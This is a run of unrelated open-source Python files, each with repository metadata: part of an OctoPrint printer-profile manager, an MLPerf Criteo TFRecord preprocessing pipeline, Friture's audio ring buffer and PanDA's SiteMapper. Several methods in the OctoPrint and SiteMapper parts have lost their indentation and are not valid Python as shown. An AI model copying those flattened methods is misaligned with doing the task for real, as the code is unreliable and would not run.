			t1 = profile["stepperCurrent"]["t1"]
			cmds.append(self.__class__.COMMAND_Stepper_current_M906(x,y,z,t0,t1))
		# stepper microstepping -> M909
		if "stepperMircostep" in profile:
			x = profile["stepperMircostep"]["x"]
			y = profile["stepperMircostep"]["y"]
			z = profile["stepperMircostep"]["z"]
			t0 = profile["stepperMircostep"]["t0"]
			t1 = profile["stepperMircostep"]["t1"]
			cmds.append(self.__class__.COMMAND_Stepper_mircostep_M909(x,y,z,t0,t1))
		'''
		if "endstopInvert" in profile:
			x = profile["endstopInvert"]["x"]
			y = profile["endstopInvert"]["y"]
			z = profile["endstopInvert"]["z"]
			cmds.append(self.__class__.COMMAND_Endstop_invert_M526(x,y,z))
		if "endstopMinimumInput" in profile:
			x = profile["endstopMinimumInput"]["x"]
			y = profile["endstopMinimumInput"]["y"]
			z = profile["endstopMinimumInput"]["z"]
			cmds.append(self.__class__.COMMAND_Minimum_endstop_input_M523(x,y,z))
		if "endstopMaxmumInput" in profile:
			x = profile["endstopMaxmumInput"]["x"]
			y = profile["endstopMaxmumInput"]["y"]
			z = profile["endstopMaxmumInput"]["z"]
			cmds.append(self.__class__.COMMAND_Maximum_endstop_input_M524(x,y,z))
		'''
		# software endstops -> M522
		if "endstopUseSoftware" in profile:
			minVal = profile["endstopUseSoftware"]["minVal"]
			maxVal = profile["endstopUseSoftware"]["maxVal"]
			cmds.append(self.__class__.COMMAND_Use_software_endstop_M522(minVal,maxVal))
		# retraction -> M207, recover -> M208
		if "retractLength" in profile:
			length = profile["retractLength"]["length"]
			feedrate = profile["retractLength"]["feedrate"]
			zlift = profile["retractLength"]["zlift"]
			cmds.append(self.__class__.COMMAND_Retract_length_M207(length,feedrate,zlift))
		if "retractRecoverLength" in profile:
			length = profile["retractRecoverLength"]["length"]
			feedrate = profile["retractRecoverLength"]["feedrate"]
			cmds.append(self.__class__.COMMAND_Retract_recover_length_M208(length,feedrate))
		# homing feedrates -> M210
		if "homingFeedrates" in profile:
			x = profile["homingFeedrates"]["x"]
			y = profile["homingFeedrates"]["y"]
			z = profile["homingFeedrates"]["z"]
			e = profile["homingFeedrates"]["e"]
			cmds.append(self.__class__.COMMAND_Homing_feedrate_M210(x,y,z,e))
		# acceleration limits -> M201, move/retract acceleration -> M204
		if "accelerationMaximum" in profile:
			x = profile["accelerationMaximum"]["x"]
			y = profile["accelerationMaximum"]["y"]
			z = profile["accelerationMaximum"]["z"]
			e = profile["accelerationMaximum"]["e"]
			cmds.append(self.__class__.COMMAND_Maximum_acceleration_M201(x,y,z,e))
		if "accelerationMoveRetract" in profile:
			move = profile["accelerationMoveRetract"]["move"]
			retract = profile["accelerationMoveRetract"]["retract"]
			cmds.append(self.__class__.COMMAND_Acceleration_M204(move,retract))
		# jerk / minimum feedrate tuning -> M205
		if "advancedVariables" in profile:
			minimumfeedrate = profile["advancedVariables"]["minimumfeedrate"]
			mintravelfeedrate = profile["advancedVariables"]["mintravelfeedrate"]
			maxXYJerk = profile["advancedVariables"]["maxXYJerk"]
			maxZJerk = profile["advancedVariables"]["maxZJerk"]
			maxEJerk = profile["advancedVariables"]["maxEJerk"]
			cmds.append(self.__class__.COMMAND_Advanced_variables_M205(minimumfeedrate, mintravelfeedrate,maxXYJerk,maxZJerk,maxEJerk))
		# dynamic current -> M911, extension interface -> M916
		if "dynamicCurrent" in profile:
			dynamicCurrent = profile["dynamicCurrent"]
			cmds.append(self.__class__.COMMAND_DYNAMIC_CURRENT_M911(dynamicCurrent))
		if "extendInterface" in profile:
			extendInterface = profile["extendInterface"]
			thermocouple = profile["thermocouple"]
			cmds.append(self.__class__.COMMAND_BBP1_EXTENT_INTERFACE_M916(extendInterface, thermocouple))
		# kinematics type -> M913 (XYZ=0, Delta=1, CoreXY=2)
		if "machineType" in profile:
			machineType = profile["machineType"]
			m_type_val={"XYZ":0, "Delta":1, "CoreXY":2}
			print("machine Type:%d" % m_type_val[machineType])
			cmds.append(self.__class__.COMMAND_MACHINE_TYPE_M913(m_type_val[machineType]))
		# delta kinematics parameters -> M665
		if "delta_args" in profile:
			diagonal_rod = profile["delta_args"]["diagonal_rod"]
			print_radius = profile["delta_args"]["print_radius"]
			segments_per_second = profile["delta_args"]["segments_per_second"]
			z_home_pos = profile["delta_args"]["z_home_pos"]
			cmds.append(self.__class__.COMMAND_DELTA_ARGS_M665(diagonal_rod, print_radius, segments_per_second, z_home_pos))
		# heater PID sets for T0 / T1 / bed -> one M301 each (t = 0,1,2)
		if "pids" in profile:
			pids = []
			pid0 = profile["pids"]["t0"]
			pid1 = profile["pids"]["t1"]
			pidbed = profile["pids"]["bed"]
			pids.append(pid0)
			pids.append(pid1)
			pids.append(pidbed)
			print("pidbed:%s" %(str(pids)))
			t = 0
			for pid in pids:
				p,i,d,factor,offset,limit = pid["p"],pid["i"],pid["d"],pid["factor"],pid["offset"],pid["limit"]
				cmds.append(self.__class__.COMMAND_TEMPETURE_PID_M301(t,p,i,d,factor,offset,limit))
				t += 1
		# terminator telling the firmware the settings batch is complete
		cmds.append(self.__class__.COMMAND_Finish_sending_M910)
		#for cmd in cmds:
		#	print("cmd:%s" % str(cmd))
		return cmds
	def save(self, profile, allow_overwrite=False, make_default=False):
		"""Persist a profile, push its settings to the printer and EEPROM.

		The profile must contain an "id" or a "name" (used as identifier
		after sanitizing). Raises ValueError otherwise.
		"""
		if "id" in profile:
			identifier = profile["id"]
		elif "name" in profile:
			identifier = profile["name"]
		else:
			raise ValueError("profile must contain either id or name")
		identifier = self._sanitize(identifier)
		profile["id"] = identifier
		# strip values that equal the defaults before writing to disk
		profile = dict_clean(profile, self.__class__.default)
		print("lkj save identifier:%s" % str(identifier))
		#lkj
		'''from octoprint.server import printer
		if printer.isOperational():
			cmds = self.__send_all_update_epprom(profile)
			printer.commands(cmds)
			cmd_eeprom = GcodeCommand("M500")
			printer.command(cmd_eeprom)
			pass
		print("lkj save 2")
		'''
		# apply the settings to the firmware and store them in EEPROM
		self.sendPreferenctParameter(profile)
		self.saveToEEPROM()
		self.getBeforeAndAfterPrintParameter(profile)
		if identifier == "_default":
			# the default profile is stored in the settings, not its own file
			default_profile = dict_merge(self._load_default(), profile)
			settings().set(["printerProfiles", "defaultProfile"], default_profile, defaults=dict(printerProfiles=dict(defaultProfile=self.__class__.default)))
			settings().save()
		else:
			self._save_to_path(self._get_profile_path(identifier), profile, allow_overwrite=allow_overwrite)
		if make_default:
			settings().set(["printerProfiles", "default"], identifier)
		# re-select so a changed current profile is re-applied
		if self._current is not None and self._current["id"] == identifier:
			self.select(identifier)
		return self.get(identifier)
#lkj
	def sendPreferenctParameter(self, inProfile):
		"""Push all profile settings to the printer firmware (RAM only).

		Use saveToEEPROM() afterwards to persist them on the board.
		Does nothing when the printer is not operational.
		"""
		from octoprint.server import printer
		if printer.isOperational():
			cmds = self.__send_all_update_epprom(inProfile)
			printer.commands(cmds)
			#cmd_eeprom = GcodeCommand("M500")
			#printer.command(cmd_eeprom)
			print("lkj sendPreferenctParameter")
		''''''
		return
	def saveToEEPROM(self):
		"""Ask the firmware to store its current settings to EEPROM (M500)."""
		from octoprint.server import printer
		if printer.isOperational():
			cmd_eeprom = GcodeCommand("M500")
			printer.command(cmd_eeprom)
def getBeforeAndAfterPrintParameter(self, inProfile):
from octoprint.server import printer
if "cmdPrintStart" in inProfile:
cmds = inProfile["cmdPrintStart"]
gcode_cmds = []
print("lkj cmdPrintStart cmds:%s" %(str(cmds)))
for cmd in cmds:
str_cmd = cmd["cmd"]
gcode_cmd = GcodeCommand.from_line(str_cmd)
print("lkj cmdPrintStart gcode_cmd:%s" %(str(gcode_cmd)))
gcode_cmds.append(gcode_cmd)
printer.setCmdBeforePrint(gcode_cmds)
if "cmdPrintStop" in inProfile:
cmds = inProfile["cmdPrintStop"]
gcode_cmds = []
print("lkj cmdPrintStop cmds:%s" %(str(cmds)))
for cmd in cmds:
str_cmd = cmd["cmd"]
gcode_cmd = GcodeCommand.from_line(str_cmd)
print("lkj cmdPrintStop gcode_cmd:%s" %(str(gcode_cmd)))
gcode_cmds.append(gcode_cmd)
printer.setCmdAfterPrint(gcode_cmds)
print("lkj getBeforeAndAfterPrintParameter")
	def get_default(self):
		"""Return the configured default profile.

		Falls back to the built-in defaults when no default is configured
		or the configured one cannot be loaded.
		"""
		default = settings().get(["printerProfiles", "default"])
		if default is not None and self.exists(default):
			profile = self.get(default)
			if profile is not None:
				return profile
		return self._load_default()
def set_default(self, identifier):
all_identifiers = self._load_all_identifiers().keys()
if identifier is not None and not identifier in all_identifiers:
return
settings().set(["printerProfile", "default"], identifier)
settings().save()
def get_current_or_default(self):
if self._current is not None:
return self._current
else:
return self.get_default()
	def get_current(self):
		"""Currently selected profile dict, or None when nothing is selected."""
		return self._current
def exists(self, identifier):
if identifier is None:
return False
elif identifier == "_default":
return True
else:
path = self._get_profile_path(identifier)
return os.path.exists(path) and os.path.isfile(path)
	def _load_all(self):
		"""Load every stored profile, each merged over the default profile."""
		all_identifiers = self._load_all_identifiers()
		results = dict()
		for identifier, path in all_identifiers.items():
			if identifier == "_default":
				profile = self._load_default()
			else:
				profile = self._load_from_path(path)
			if profile is None:
				continue
			# merge on top of the defaults so missing keys are filled in
			results[identifier] = dict_merge(self._load_default(), profile)
		return results
	def _load_all_identifiers(self):
		"""Map stored profile identifiers to their file paths.

		The "_default" entry is always present and maps to None since the
		default profile lives in the settings, not in its own file.
		"""
		results = dict(_default=None)
		for entry in os.listdir(self._folder):
			# skip hidden files, non-profile files and the reserved default name
			if entry.startswith(".") or not entry.endswith(".profile") or entry == "_default.profile":
				continue
			path = os.path.join(self._folder, entry)
			if not os.path.isfile(path):
				continue
			identifier = entry[:-len(".profile")]
			results[identifier] = path
		return results
	def _load_from_path(self, path):
		"""Parse one profile YAML file; None when the file is missing."""
		if not os.path.exists(path) or not os.path.isfile(path):
			return None
		import yaml
		with open(path) as f:
			profile = yaml.safe_load(f)
		return profile
def _save_to_path(self, path, profile, allow_overwrite=False):
if os.path.exists(path) and not allow_overwrite:
raise SaveError("Profile %s already exists and not allowed to overwrite" % profile["id"])
import yaml
with open(path, "wb") as f:
try:
yaml.safe_dump(profile, f, default_flow_style=False, indent=" ", allow_unicode=True)
except Exception as e:
raise SaveError("Cannot save profile %s: %s" % (profile["id"], e.message))
def _remove_from_path(self, path):
try:
os.remove(path)
return True
except:
return False
	def _load_default(self):
		"""Built-in defaults overlaid with the stored default profile."""
		default_profile = settings().get(["printerProfiles", "defaultProfile"])
		# deep-copy so callers cannot mutate the class-level defaults
		return dict_merge(copy.deepcopy(self.__class__.default), default_profile)
def _get_profile_path(self, identifier):
return os.path.join(self._folder, "%s.profile" % identifier)
def _sanitize(self, name):
if name is None:
return None
if "/" in name or "\\" in name:
raise ValueError("name must not contain / or \\")
import string
valid_chars = "-_.() {ascii}{digits}".format(ascii=string.ascii_letters, digits=string.digits)
sanitized_name = ''.join(c for c in name if c in valid_chars)
sanitized_name = sanitized_name.replace(" ", "_")
return sanitized_name
| fastbot3d/Octoprint | src/octoprint/printer/profile.py | Python | agpl-3.0 | 22,124 |
# Lint as: python3
"""Flume preprocessing pipeline for Criteo data.
"""
import collections
import csv
import logging as stdlogging
import re
from absl import app
from absl import flags
import apache_beam as beam
import numpy as np
import tensorflow.compat.v1 as tf
import runner
FLAGS = flags.FLAGS
flags.DEFINE_string(
"input_path", "",
("Input path. Be sure to set this to cover all data, to ensure "
"that sparse vocabs are complete."))
flags.DEFINE_string(
"output_path", "",
"Output directory and prefix.")
flags.DEFINE_integer(
"batch_size", 4,
"Number of samples to group into a batch.")
flags.DEFINE_bool(
"drop_remainder", False,
("If true, drop remainder elements that cannot compose a full batch. "
"If false, pad the remainder."))
NUMERIC_FEATURE_KEYS = ["int-feature-%d" % x for x in range(1, 14)]
CATEGORICAL_FEATURE_KEYS = ["categorical-feature-%d" % x for x in range(14, 40)]
LABEL_KEY = "clicked"
FIELDS = [LABEL_KEY] + NUMERIC_FEATURE_KEYS + CATEGORICAL_FEATURE_KEYS
num_samples = 0
num_files = 0
def gen_batches(input_filename):
  """Function to be used by beam.Map().

  Reads one tab-separated Criteo shard, groups rows into batches of
  FLAGS.batch_size and writes them as serialized tf.train.Examples to a
  TFRecord file derived from the input name. Returns the batch count.
  """
  print("Worker processing file {}".format(input_filename))
  def _output_file_index(s):
    # derive a stable output suffix from the digits in the input filename
    nums = re.findall(r"\d+", s)
    if len(nums) == 1:
      return nums[0]
    elif len(nums) > 1:
      return nums[-2]+"-of-"+nums[-1]
    else:
      # no digits at all: fall back to a hash-based index
      idx = abs(hash(s)) % (10 ** 8)
      return str(idx)
  out_filename = FLAGS.output_path + _output_file_index(input_filename)
  def _float_feature(value):
    return tf.train.Feature(float_list=tf.train.FloatList(value=value))
  def _bytes_feature(value):
    return tf.train.Feature(bytes_list=tf.train.BytesList(value=value))
  # def _int64_feature(value):
  #   return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
  def _serialize_batch(feature_dict):
    # categorical columns are packed as raw little-endian int32 bytes,
    # everything else as float features
    for key in feature_dict:
      if key in CATEGORICAL_FEATURE_KEYS:
        # feature_dict[key] = _int64_feature(feature_dict[key])
        # Serialize-to-string for int32s.
        array_int32 = np.array(feature_dict[key], dtype=np.int32)
        feature_dict[key] = _bytes_feature(
            [memoryview(array_int32).tobytes()])
      else:
        feature_dict[key] = _float_feature(feature_dict[key])
    example_proto = tf.train.Example(
        features=tf.train.Features(feature=feature_dict))
    return example_proto.SerializeToString()
  def _extract_batch(dict_reader, batch_size):
    """dict_reader is a csv.DictReader."""
    batch_features = collections.defaultdict(list)
    idx = 0
    for idx, sample in enumerate(dict_reader):
      for key in sample:
        if key in CATEGORICAL_FEATURE_KEYS:
          batch_features[key].append(int(sample[key]))
        else:
          batch_features[key].append(float(sample[key]))
      if (idx + 1) % batch_size == 0:
        yield batch_size, batch_features
        batch_features.clear()
    # If less than a batch remains, return the number of valid entries in batch.
    yield (idx + 1) % batch_size, batch_features
  def _pad_to_batch(feature_dict, samples_written):
    # pad trailing partial batches; labels use -1.0 so they can be masked out
    pad_size = FLAGS.batch_size - samples_written
    for key in feature_dict:
      if key in CATEGORICAL_FEATURE_KEYS:
        feature_dict[key].extend([0] * pad_size)
      elif key in NUMERIC_FEATURE_KEYS:
        feature_dict[key].extend([0.0] * pad_size)
      elif key == LABEL_KEY:
        feature_dict[key].extend([-1.0] * pad_size)
      else:
        raise ValueError("Unknown feature key while padding to batch.")
    return feature_dict
  num_batches = 0
  with tf.io.gfile.GFile(input_filename, "r") as f:
    dict_reader = csv.DictReader(f, dialect=csv.excel_tab, fieldnames=FIELDS)
    with tf.io.TFRecordWriter(out_filename) as writer:
      for samples_written, features_batch in _extract_batch(
          dict_reader, FLAGS.batch_size):
        if samples_written < FLAGS.batch_size and not FLAGS.drop_remainder:
          features_batch = _pad_to_batch(features_batch, samples_written)
        example_bytes = _serialize_batch(features_batch)
        writer.write(example_bytes)
        num_batches += 1
  return num_batches
def process_files(input_path):
  """Returns a pipeline which creates batched TFRecords.

  Args:
    input_path: File pattern to read.
  """
  def pipeline(root):
    """Pipeline instantiation function.

    Args:
      root: Source pipeline from which to extend.
    """
    global num_files
    filename_list = tf.io.gfile.glob(input_path)
    num_files = len(filename_list)
    assert num_files > 0, "No files provided."
    print("Beginning processing on {} files.".format(num_files))
    def capture_sample_cnt(line):
      # side channel: record the total sample count computed by the pipeline
      global num_samples
      num_samples = int(line)
      print("\n** Number of samples: {}".format(num_samples))
    # first branch: count all input lines to report the number of samples
    _ = (
        root
        | beam.io.ReadFromText(input_path)
        | beam.combiners.Count.Globally()
        | beam.Map(capture_sample_cnt))
    def _print_output(num_batches):
      num_batches = int(num_batches)
      print("\n** {} batches created ({} samples).\n".format(
          num_batches, num_batches * FLAGS.batch_size))
    # second branch: fan out one gen_batches() call per input file and
    # sum the per-file batch counts for the final report
    _ = (
        root
        | "CreateFilenameList" >> beam.Create(filename_list)
        | "GenerateBatches" >> beam.Map(gen_batches)
        | "AccumulateNumBatches" >> beam.CombineGlobally(sum)
        | "PrintReport" >> beam.Map(_print_output))
  return pipeline
def main(argv):
  """Entry point: build and run the Flume/Beam preprocessing pipeline."""
  del argv
  stdlogging.getLogger().setLevel(stdlogging.INFO)
  runner.program_started()  # Must be called before creating the pipeline.
  pipeline = process_files(FLAGS.input_path)
  runner.FlumeRunner().run(pipeline).wait_until_finish()
if __name__ == "__main__":
app.run(main)
| mlperf/training_results_v0.7 | Google/benchmarks/dlrm/implementations/dlrm-research-TF-tpu-v4-512/criteo_util/criteo_batched.py | Python | apache-2.0 | 5,711 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2009 Timothée Lecomte
# This file is part of Friture.
#
# Friture is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as published by
# the Free Software Foundation.
#
# Friture is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Friture. If not, see <http://www.gnu.org/licenses/>.
# FIXME problem when self.offset overflows the MAXINT limit !
from numpy import zeros
class RingBuffer():
    """Circular sample buffer backed by a duplicated numpy array.

    The underlying array stores two adjacent copies of the ring, so any
    window of up to buffer_length samples can be returned as a single
    contiguous slice without wrap-around logic at read time. The buffer
    grows automatically when callers request more than it holds.
    """
    def __init__(self, logger):
        # buffer length is dynamic based on the needs
        self.buffer_length = 10000
        # shape: (channels, 2 * buffer_length) — every sample is stored twice
        self.buffer = zeros((1, 2 * self.buffer_length))
        # total number of samples ever pushed (monotonic write position)
        self.offset = 0
        self.logger = logger
    def push(self, floatdata):
        # update the circular buffer
        dim = floatdata.shape[0]
        l = floatdata.shape[1]
        if dim != self.buffer.shape[0]:
            # switched from single to dual channels or vice versa
            self.buffer = zeros((dim, 2 * self.buffer_length))
        self.grow_if_needed(l)
        # first copy, always complete
        offset = self.offset % self.buffer_length
        self.buffer[:, offset: offset + l] = floatdata[:, :]
        # second copy, can be folded
        direct = min(l, self.buffer_length - offset)
        folded = l - direct
        self.buffer[:, offset + self.buffer_length: offset + self.buffer_length + direct] = floatdata[:, 0: direct]
        self.buffer[:, :folded] = floatdata[:, direct:]
        self.offset += l
    def data(self, length):
        # return the most recent `length` samples as one contiguous slice
        self.grow_if_needed(length)
        stop = self.offset % self.buffer_length + self.buffer_length
        start = stop - length
        # growing changes buffer_length, so recompute until indices fit
        while stop > 2 * self.buffer_length:
            self.grow_if_needed(stop)
            stop = self.offset % self.buffer_length + self.buffer_length
            start = stop - length
        if start > 2 * self.buffer_length or start < 0:
            raise ArithmeticError("Start index is wrong %d %d" % (start, self.buffer_length))
        if stop > 2 * self.buffer_length:
            raise ArithmeticError("Stop index is larger than buffer size: %d > %d" % (stop, 2 * self.buffer_length))
        return self.buffer[:, start: stop]
    def data_older(self, length, delay_samples):
        # like data(), but ending `delay_samples` samples in the past
        self.grow_if_needed(length + delay_samples)
        start = (self.offset - length - delay_samples) % self.buffer_length + self.buffer_length
        stop = start + length
        return self.buffer[:, start: stop]
    def data_indexed(self, start, length):
        # return `length` samples ending at the absolute write position `start`
        delay = self.offset - start
        self.grow_if_needed(length + delay)
        stop0 = start % self.buffer_length + self.buffer_length
        start0 = stop0 - length
        if start0 > 2 * self.buffer_length or start0 < 0:
            raise ArithmeticError("Start index is wrong %d %d" % (start0, self.buffer_length))
        if stop0 > 2 * self.buffer_length:
            raise ArithmeticError("Stop index is larger than buffer size: %d > %d" % (stop0, 2 * self.buffer_length))
        return self.buffer[:, start0: stop0]
    def grow_if_needed(self, length):
        # enlarge the ring (with 1.5x head-room) while keeping self.offset valid
        if length > self.buffer_length:
            # let the buffer grow according to our needs
            old_length = self.buffer_length
            new_length = int(1.5 * length)
            message = "Ringbuffer: growing buffer for length %d" % (new_length)
            if self.logger is not None:
                self.logger.push(message)
            else:
                print(message)
            # create new buffer
            newbuffer = zeros((self.buffer.shape[0], 2 * new_length))
            # copy existing data so that self.offset does not have to be changed
            old_offset_mod = self.offset % old_length
            new_offset_mod = self.offset % new_length
            shift = new_offset_mod - old_offset_mod
            # first copy, always complete
            newbuffer[:, shift:shift + old_length] = self.buffer[:, :old_length]
            # second copy, can be folded
            direct = min(old_length, new_length - shift)
            folded = old_length - direct
            newbuffer[:, new_length + shift:new_length + shift + direct] = self.buffer[:, :direct]
            newbuffer[:, :folded] = self.buffer[:, direct:direct + folded]
            # assign self.butter to the new larger buffer
            self.buffer = newbuffer
            self.buffer_length = new_length
| UIKit0/friture | friture/ringbuffer.py | Python | gpl-3.0 | 4,737 |
import re
import sys
import traceback
from config import panda_config
# logger
from pandalogger.PandaLogger import PandaLogger
_logger = PandaLogger().getLogger('SiteMapper')
# PandaIDs
from PandaSiteIDs import PandaSiteIDs
# default site
from taskbuffer.SiteSpec import SiteSpec
from taskbuffer.NucleusSpec import NucleusSpec
defSite = SiteSpec()
defSite.sitename = panda_config.def_sitename
defSite.nickname = panda_config.def_nickname
defSite.dq2url = panda_config.def_dq2url
defSite.ddm = panda_config.def_ddm
defSite.type = panda_config.def_type
defSite.gatekeeper = panda_config.def_gatekeeper
defSite.status = panda_config.def_status
defSite.setokens = {}
worldCloudName = 'WORLD'
nucleusTag = 'nucleus:'
########################################################################
class SiteMapper:
# constructor
    def __init__(self,taskBuffer,verbose=False):
        """Build site/cloud/nucleus maps from the task buffer database.

        Reads cloud and site tables, merges per-nickname site records
        into per-siteID SiteSpecs, collects nuclei and satellites, and
        fills each cloud's 'sites' list plus the special WORLD cloud.
        Any failure is logged and leaves partially-filled maps.
        """
        _logger.debug('__init__ SiteMapper')
        try:
            # site list
            self.siteSpecList = {}
            # sites not belonging to a cloud
            self.defCloudSites = []
            # cloud specification
            self.cloudSpec = {}
            # spec for WORLD cloud
            self.worldCloudSpec = {}
            # nuclei
            self.nuclei = {}
            # satellites
            self.satellites = {}
            # create CloudSpec list
            tmpCloudListDB = taskBuffer.getCloudList()
            for tmpName,tmpCloudSpec in tmpCloudListDB.iteritems():
                cloudSpec = {}
                # copy attributes from CloudSepc
                for tmpAttr in tmpCloudSpec._attributes:
                    cloudSpec[tmpAttr] = getattr(tmpCloudSpec,tmpAttr)
                # append additional attributes
                #   source : Panda siteID for source
                #   dest   : Panda siteID for dest
                #   sites  : Panda siteIDs in the cloud
                cloudSpec['source'] = cloudSpec['tier1']
                cloudSpec['dest'] = cloudSpec['tier1']
                cloudSpec['sites'] = []
                if tmpName == worldCloudName:
                    self.worldCloudSpec = cloudSpec
                else:
                    self.cloudSpec[tmpName] = cloudSpec
                    _logger.debug('Cloud->%s %s' % (tmpName,str(self.cloudSpec[tmpName])))
            # add WORLD cloud
            self.worldCloudSpec['sites'] = []
            # get list of PandaIDs
            siteIDsList = taskBuffer.getSiteList()
            firstDefault = True
            # read full list from DB
            siteFullList = taskBuffer.getSiteInfo()
            # read DB to produce paramters in siteinfo dynamically
            for tmpID,tmpNicknameList in siteIDsList.iteritems():
                for tmpNickname in tmpNicknameList:
                    # invalid nickname
                    if not siteFullList.has_key(tmpNickname):
                        continue
                    # get full spec
                    ret = siteFullList[tmpNickname]
                    # append
                    if ret == None:
                        _logger.error('Could not read site info for %s:%s' % (tmpID,tmpNickname))
                    elif (firstDefault and tmpID == defSite.sitename) or (not self.siteSpecList.has_key(tmpID)) \
                             or (self.siteSpecList.has_key(tmpID) and self.siteSpecList[tmpID].status in ['offline','']):
                        # overwrite default or remove existing offline
                        if firstDefault and tmpID == defSite.sitename:
                            del self.siteSpecList[tmpID]
                            firstDefault = False
                        elif self.siteSpecList.has_key(tmpID) and self.siteSpecList[tmpID].status in ['offline','']:
                            del self.siteSpecList[tmpID]
                        # append
                        if not self.siteSpecList.has_key(tmpID):
                            # determine type following a convention
                            tmpType = 'production'
                            if tmpID.startswith('ANALY_'):
                                tmpType = 'analysis'
                            elif re.search('test',tmpID,re.I) or \
                                     (PandaSiteIDs.has_key(tmpID) and PandaSiteIDs[tmpID]['status']!='OK'):
                                tmpType = 'test'
                            # set type
                            ret.sitename = tmpID
                            ret.type = tmpType
                            # don't use site for production when cloud is undefined
                            if ret.type == 'production' and ret.cloud == '':
                                _logger.error('Empty cloud for %s:%s' % (tmpID,tmpNickname))
                            else:
                                self.siteSpecList[tmpID] = ret
                    else:
                        # overwrite status
                        if not ret.status in ['offline','']:
                            if self.siteSpecList[tmpID].status != 'online':
                                self.siteSpecList[tmpID].status = ret.status
                            # use larger maxinputsize and memory
                            try:
                                if ret.status in ['online']:
                                    if self.siteSpecList[tmpID].maxinputsize < ret.maxinputsize or \
                                           ret.maxinputsize == 0:
                                        self.siteSpecList[tmpID].maxinputsize = ret.maxinputsize
                                    if (self.siteSpecList[tmpID].memory != 0 and self.siteSpecList[tmpID].memory < ret.memory) or \
                                           ret.memory == 0:
                                        self.siteSpecList[tmpID].memory = ret.memory
                            except:
                                errtype, errvalue = sys.exc_info()[:2]
                                _logger.error("%s memory/inputsize failuer : %s %s" % (tmpID,errtype,errvalue))
                    # collect nuclei
                    if ret.role == 'nucleus' and ret.type == 'production':
                        if not ret.pandasite in self.nuclei:
                            nucleus = NucleusSpec(ret.pandasite)
                            nucleus.state = ret.pandasite_state
                            self.nuclei[ret.pandasite] = nucleus
                        self.nuclei[ret.pandasite].add(ret.sitename,ret.ddm_endpoints)
                    # collect satellites
                    if ret.role == 'satellite' and ret.type == 'production':
                        if not ret.pandasite in self.satellites:
                            satellite = NucleusSpec(ret.pandasite)
                            satellite.state = ret.pandasite_state
                            self.satellites[ret.pandasite] = satellite
                        self.satellites[ret.pandasite].add(ret.sitename,ret.ddm_endpoints)
            # make cloudSpec
            for siteSpec in self.siteSpecList.values():
                # choose only prod sites
                if siteSpec.type != 'production':
                    continue
                # append prod site in cloud
                for tmpCloud in siteSpec.cloudlist:
                    if self.cloudSpec.has_key(tmpCloud):
                        if not siteSpec.sitename in self.cloudSpec[tmpCloud]['sites']:
                            # append
                            self.cloudSpec[tmpCloud]['sites'].append(siteSpec.sitename)
                    else:
                        # append to the default cloud
                        if not siteSpec.sitename in self.defCloudSites:
                            # append
                            self.defCloudSites.append(siteSpec.sitename)
                # add to WORLD cloud
                if not siteSpec.sitename in self.worldCloudSpec['sites']:
                    self.worldCloudSpec['sites'].append(siteSpec.sitename)
            # set defCloudSites for backward compatibility
            if self.cloudSpec.has_key('US'):
                # use US sites
                self.defCloudSites = self.cloudSpec['US']['sites']
            else:
                # add def site as a protection if defCloudSites is empty
                self.defCloudSites.append(defSite.sitename)
            # dump sites
            if verbose:
                _logger.debug('========= dump =========')
                for tmpSite,tmpSiteSpec in self.siteSpecList.iteritems():
                    _logger.debug('Site->%s' % str(tmpSiteSpec))
            # check
            for tmpCloud,tmpVals in self.cloudSpec.iteritems():
                # set T1: the destination site is moved to the head of the list
                try:
                    tmpVals['sites'].remove(tmpVals['dest'])
                except:
                    pass
                tmpVals['sites'].insert(0,tmpVals['dest'])
                # dump
                _logger.debug('Cloud:%s has %s' % (tmpCloud,tmpVals['sites']))
                for tmpSite in tmpVals['sites']:
                    if not self.siteSpecList.has_key(tmpSite):
                        _logger.debug(" '%s' doesn't exist" % tmpSite)
                        continue
                    tmpSiteSpec = self.siteSpecList[tmpSite]
                    if tmpSiteSpec.status in ['offline']:
                        _logger.debug('  %s:%s' % (tmpSite,tmpSiteSpec.status))
            _logger.debug('Cloud:XX has %s' % self.defCloudSites)
        except:
            type, value, traceBack = sys.exc_info()
            _logger.error("__init__ SiteMapper : %s %s" % (type,value))
            _logger.error(traceback.format_exc())
        _logger.debug('__init__ SiteMapper done')
# accessor for site
def getSite(self,site):
try:
if site.startswith(nucleusTag):
tmpName = site.split(':')[-1]
if tmpName in self.nuclei:
site = self.nuclei[tmpName].getOnePandaSite()
elif tmpName in self.satellites:
site = self.satellites[tmpName].getOnePandaSite()
except:
pass
if self.siteSpecList.has_key(site):
return self.siteSpecList[site]
else:
# return default site
return defSite
# check if site exists
def checkSite(self,site):
try:
if site.startswith(nucleusTag):
tmpName = site.split(':')[-1]
if tmpName in self.nuclei:
site = self.nuclei[tmpName].getOnePandaSite()
elif tmpName in self.satellites:
site = self.satellites[tmpName].getOnePandaSite()
except:
pass
return self.siteSpecList.has_key(site)
# resolve nucleus
def resolveNucleus(self,site):
try:
if site.startswith(nucleusTag):
tmpName = site.split(':')[-1]
if tmpName in self.nuclei:
site = self.nuclei[tmpName].getOnePandaSite()
elif tmpName in self.satellites:
site = self.satellites[tmpName].getOnePandaSite()
except:
pass
if site == 'NULL':
site = None
return site
# accessor for cloud
def getCloud(self,cloud):
if self.cloudSpec.has_key(cloud):
return self.cloudSpec[cloud]
elif cloud == worldCloudName:
return self.worldCloudSpec
else:
# return sites in default cloud
ret = { 'source' : 'default',
'dest' : 'default',
'sites' : self.defCloudSites,
'transtimelo' : 2,
'transtimehi' : 1,
}
return ret
# accessor for cloud
def checkCloud(self,cloud):
if self.cloudSpec.has_key(cloud):
return True
elif cloud == worldCloudName:
return True
else:
return False
# accessor for cloud list
def getCloudList(self):
return self.cloudSpec.keys()
# get ddm point
def getDdmEndpoint(self,siteID,storageToken):
if not self.checkSite(siteID):
return None
siteSpec = self.getSite(siteID)
if siteSpec.setokens.has_key(storageToken):
return siteSpec.setokens[storageToken]
return siteSpec.ddm
# get nucleus
def getNucleus(self,tmpName):
if tmpName in self.nuclei:
return self.nuclei[tmpName]
if tmpName in self.satellites:
return self.satellites[tmpName]
return None
| RRCKI/panda-server | pandaserver/brokerage/SiteMapper.py | Python | apache-2.0 | 12,774 |
# Gramps - a GTK+/GNOME based genealogy program
#
